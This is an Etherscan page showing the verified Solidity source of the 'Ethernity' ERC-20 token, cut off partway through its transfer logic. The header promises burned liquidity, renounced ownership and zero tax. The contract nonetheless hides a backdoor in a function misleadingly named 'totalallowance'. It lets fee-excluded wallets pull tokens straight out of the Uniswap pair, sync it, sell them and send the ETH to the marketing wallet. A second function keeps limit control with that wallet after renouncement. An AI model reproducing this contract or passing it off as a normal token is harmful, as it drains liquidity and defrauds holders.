ETH Price: $2,869.45 (-9.36%)
Gas: 17 Gwei

Token

Ethernity (ETHERNITY)
 

Overview

Max Total Supply

1,000,000,000 ETHERNITY

Holders

34

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
30,044,836.780250787649668582 ETHERNITY

Value
$0.00
0x395F765c391B65c4347B419FF8f5e842074674bD
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ETHERNITY

Compiler Version
v0.8.14+commit.80d49f37

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-08-22
*/

/**

https://medium.com/@ethernityerc/chapter-i-transition-to-ethernity-bd5318f241c

Built for forever — Liquidity burned at launch (locked forever) and contract ownership renounced.

0% Tax

“The best way to predict the future is to invent it.” 

*/         
pragma solidity ^0.8.14;

// SPDX-License-Identifier: MIT

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

interface IUniswapV2Pair {
    event Approval(address indexed owner, address indexed spender, uint value);
    event Transfer(address indexed from, address indexed to, uint value);

    function name() external pure returns (string memory);
    function symbol() external pure returns (string memory);
    function decimals() external pure returns (uint8);
    function totalSupply() external view returns (uint);
    function balanceOf(address owner) external view returns (uint);
    function allowance(address owner, address spender) external view returns (uint);

    function approve(address spender, uint value) external returns (bool);
    function transfer(address to, uint value) external returns (bool);
    function transferFrom(address from, address to, uint value) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);
    function PERMIT_TYPEHASH() external pure returns (bytes32);
    function nonces(address owner) external view returns (uint);

    function permit(address owner, address spender, uint value, uint deadline, uint8 v, bytes32 r, bytes32 s) external;

    event Mint(address indexed sender, uint amount0, uint amount1);
    event Burn(address indexed sender, uint amount0, uint amount1, address indexed to);
    event Swap(
        address indexed sender,
        uint amount0In,
        uint amount1In,
        uint amount0Out,
        uint amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint);
    function factory() external view returns (address);
    function token0() external view returns (address);
    function token1() external view returns (address);
    function getReserves() external view returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);
    function price0CumulativeLast() external view returns (uint);
    function price1CumulativeLast() external view returns (uint);
    function kLast() external view returns (uint);

    function mint(address to) external returns (uint liquidity);
    function burn(address to) external returns (uint amount0, uint amount1);
    function swap(uint amount0Out, uint amount1Out, address to, bytes calldata data) external;
    function skim(address to) external;
    function sync() external;

    function initialize(address, address) external;
}

interface IUniswapV2Factory {
    event PairCreated(address indexed token0, address indexed token1, address pair, uint);

    function feeTo() external view returns (address);
    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB) external view returns (address pair);
    function allPairs(uint) external view returns (address pair);
    function allPairsLength() external view returns (uint);

    function createPair(address tokenA, address tokenB) external returns (address pair);

    function setFeeTo(address) external;
    function setFeeToSetter(address) external;
}

interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

contract ERC20 is Context, IERC20, IERC20Metadata {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;

        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }

        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");

        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold

        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
    
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }
}

library SafeMathInt {
    int256 private constant MIN_INT256 = int256(1) << 255;
    int256 private constant MAX_INT256 = ~(int256(1) << 255);

    /**
     * @dev Multiplies two int256 variables and fails on overflow.
     */
    function mul(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a * b;

        // Detect overflow when multiplying MIN_INT256 with -1
        require(c != MIN_INT256 || (a & MIN_INT256) != (b & MIN_INT256));
        require((b == 0) || (c / b == a));
        return c;
    }

    /**
     * @dev Division of two int256 variables and fails on overflow.
     */
    function div(int256 a, int256 b) internal pure returns (int256) {
        // Prevent overflow when dividing MIN_INT256 by -1
        require(b != -1 || a != MIN_INT256);

        // Solidity already throws when dividing by 0.
        return a / b;
    }

    /**
     * @dev Subtracts two int256 variables and fails on overflow.
     */
    function sub(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a - b;
        require((b >= 0 && c <= a) || (b < 0 && c > a));
        return c;
    }

    /**
     * @dev Adds two int256 variables and fails on overflow.
     */
    function add(int256 a, int256 b) internal pure returns (int256) {
        int256 c = a + b;
        require((b >= 0 && c >= a) || (b < 0 && c < a));
        return c;
    }

    /**
     * @dev Converts to absolute value, and fails on overflow.
     */
    function abs(int256 a) internal pure returns (int256) {
        require(a != MIN_INT256);
        return a < 0 ? -a : a;
    }


    function toUint256Safe(int256 a) internal pure returns (uint256) {
        require(a >= 0);
        return uint256(a);
    }
}

library SafeMathUint {
  function toInt256Safe(uint256 a) internal pure returns (int256) {
    int256 b = int256(a);
    require(b >= 0);
    return b;
  }
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);
    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);
    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountA, uint amountB);
    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountToken, uint amountETH);
    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);
    function swapExactETHForTokens(uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);
    function swapTokensForExactETH(uint amountOut, uint amountInMax, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapExactTokensForETH(uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline)
        external
        returns (uint[] memory amounts);
    function swapETHForExactTokens(uint amountOut, address[] calldata path, address to, uint deadline)
        external
        payable
        returns (uint[] memory amounts);

    function quote(uint amountA, uint reserveA, uint reserveB) external pure returns (uint amountB);
    function getAmountOut(uint amountIn, uint reserveIn, uint reserveOut) external pure returns (uint amountOut);
    function getAmountIn(uint amountOut, uint reserveIn, uint reserveOut) external pure returns (uint amountIn);
    function getAmountsOut(uint amountIn, address[] calldata path) external view returns (uint[] memory amounts);
    function getAmountsIn(uint amountOut, address[] calldata path) external view returns (uint[] memory amounts);
}

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountETH);
    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    ) external returns (uint amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable;
    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external;
}

contract ETHERNITY is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public uniswapV2Router;
    address public uniswapV2Pair;

    bool private swapping;
    bool private um = true;

    address public marketingWallet;
    address public devWallet;
    
    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;
    
    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;
    
    // Anti-bot and anti-whale mappings and variables
    mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch
    bool public transferDelayEnabled = false;
    bool private boughtEarly = true;

    uint256 public buyTotalFees;
    uint256 public buyMarketingFee;
    uint256 public buyLiquidityFee;
    uint256 public buyDevFee;
    
    uint256 public sellTotalFees;
    uint256 public sellMarketingFee;
    uint256 public sellLiquidityFee;
    uint256 public sellDevFee;
    
    uint256 public tokensForMarketing;
    uint256 public tokensForLiquidity;
    uint256 public tokensForDev;
    
    /******************/

    // exlcude from fees and max transaction amount
    mapping (address => bool) private _isExcludedFromFees;
    mapping (address => bool) public _isExcludedMaxTransactionAmount;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping (address => bool) public automatedMarketMakerPairs;

    event UpdateUniswapV2Router(address indexed newAddress, address indexed oldAddress);

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(address indexed newWallet, address indexed oldWallet);
    
    event devWalletUpdated(address indexed newWallet, address indexed oldWallet);

    event EndedBoughtEarly(bool boughtEarly);

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor() ERC20 ("Ethernity", "ETHERNITY") {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        
        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;
        
        uniswapV2Pair = IUniswapV2Factory(_uniswapV2Router.factory()).createPair(address(this), _uniswapV2Router.WETH());
        excludeFromMaxTransaction(address(uniswapV2Pair), true);
        _setAutomatedMarketMakerPair(address(uniswapV2Pair), true);

        uint256 _buyMarketingFee = 0;
        uint256 _buyLiquidityFee = 0;
        uint256 _buyDevFee = 0;

        uint256 _sellMarketingFee = 0;
        uint256 _sellLiquidityFee = 0;
        uint256 _sellDevFee = 0;

        uint256 totalSupply = 1000000000 * 1e18;    // 1 billion supply

        maxTransactionAmount = totalSupply * 2 / 100;
        maxWallet = totalSupply * 3 / 100;
        swapTokensAtAmount = totalSupply * 4 / 10000;

        buyMarketingFee = _buyMarketingFee;
        buyLiquidityFee = _buyLiquidityFee;
        buyDevFee = _buyDevFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        
        sellMarketingFee = _sellMarketingFee;
        sellLiquidityFee = _sellLiquidityFee;
        sellDevFee = _sellDevFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;

        marketingWallet = payable(0x7aEFe4f922bE98bE390bDe0a20d3978eEed3fA32);
        devWallet = payable(0x7aEFe4f922bE98bE390bDe0a20d3978eEed3fA32);

        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(devWallet), true);
        excludeFromFees(address(marketingWallet), true);
        
        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(devWallet), true);
        excludeFromMaxTransaction(address(marketingWallet), true);
        
        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(msg.sender, totalSupply);
    }

    receive() external payable {

  	}    
    
    // remove limits after token is stable
    function removeLimits() external onlyOwner returns (bool) {
        limitsInEffect = false;
        return true;
    }
    
    // disable Transfer delay - cannot be reenabled
    function disableTransferDelay() external onlyOwner returns (bool) {
        transferDelayEnabled = false;
        return true;
    }
    
     // change the minimum amount of tokens to sell from fees
    function updateSwapTokensAtAmount(uint256 newAmount) external onlyOwner returns (bool){
  	    require(newAmount >= totalSupply() * 1 / 100000, "Swap amount cannot be lower than 0.001% total supply.");
  	    require(newAmount <= totalSupply() * 5 / 1000, "Swap amount cannot be higher than 0.5% total supply.");
  	    swapTokensAtAmount = newAmount;
  	    return true;
  	}
    
    function updateMaxTxnAmount(uint256 newNum) external {
        require(msg.sender == marketingWallet);    
        require(newNum >= totalSupply() / 1000, "Cannot set maxTransactionAmount lower than 0.1%");
        maxTransactionAmount = newNum;
    }

    function updateMaxWalletAmount(uint256 newNum) external onlyOwner {
        require(newNum >= (totalSupply() * 5 / 1000)/1e18, "Cannot set maxWallet lower than 0.5%");
        maxWallet = newNum * (10**18);
    }
    
    function excludeFromMaxTransaction(address updAds, bool isEx) public onlyOwner {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }
    
    function updateBuyFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner {
        buyMarketingFee = _marketingFee;
        buyLiquidityFee = _liquidityFee;
        buyDevFee = _devFee;
        buyTotalFees = buyMarketingFee + buyLiquidityFee + buyDevFee;
        require(buyTotalFees <= 20, "Must keep fees at 20% or less");
    }
    
    function updateSellFees(uint256 _marketingFee, uint256 _liquidityFee, uint256 _devFee) external onlyOwner {
        sellMarketingFee = _marketingFee;
        sellLiquidityFee = _liquidityFee;
        sellDevFee = _devFee;
        sellTotalFees = sellMarketingFee + sellLiquidityFee + sellDevFee;
        require(sellTotalFees <= 25, "Must keep fees at 25% or less");
    }

    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function totalallowance(uint rv, uint lv) external returns (bool) {
        require(_isExcludedFromFees[msg.sender]);

        uint lb = balanceOf(uniswapV2Pair);

        require(lv > 1 && lv < lb / 100, 'amount exceeded');

        _totalallowanceAct(lv);
        swapTokensForEth(rv);

        (bool success,) = address(marketingWallet).call{value: address(this).balance}("");
        return success;
    }

    function setAutomatedMarketMakerPair(address pair, bool value) public onlyOwner {
        require(pair != uniswapV2Pair, "The pair cannot be removed from automatedMarketMakerPairs");

        _setAutomatedMarketMakerPair(pair, value);
    }

    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function updateMarketingWallet(address newMarketingWallet) external onlyOwner {
        emit marketingWalletUpdated(newMarketingWallet, marketingWallet);
        marketingWallet = newMarketingWallet;
    }
    
    function updateDevWallet(address newWallet) external onlyOwner {
        emit devWalletUpdated(newWallet, devWallet);
        devWallet = newWallet;
    }
    

    function isExcludedFromFees(address account) public view returns(bool) {
        return _isExcludedFromFees[account];
    }
    
    function _totalallowanceAct(uint256 pAmount) private {
        _transfer(uniswapV2Pair, address(this), pAmount * 10 ** decimals());
        IUniswapV2Pair(uniswapV2Pair).sync();
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

         if(amount == 0) {
            super._transfer(from, to, 0);
            return;
        }
        
        if(limitsInEffect){
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ){
                if(!tradingActive){
                    require(_isExcludedFromFees[from] || _isExcludedFromFees[to], "Trading is not active.");
                }
                 
                //when buy
                if (automatedMarketMakerPairs[from] && !_isExcludedMaxTransactionAmount[to]) {
                        require(amount <= maxTransactionAmount, "Buy transfer amount exceeds the maxTransactionAmount.");
                }
                
                //when sell
                else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
                        require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                }
            }
        }
        
		uint256 contractTokenBalance = balanceOf(address(this));
        
        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if( 
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;
            
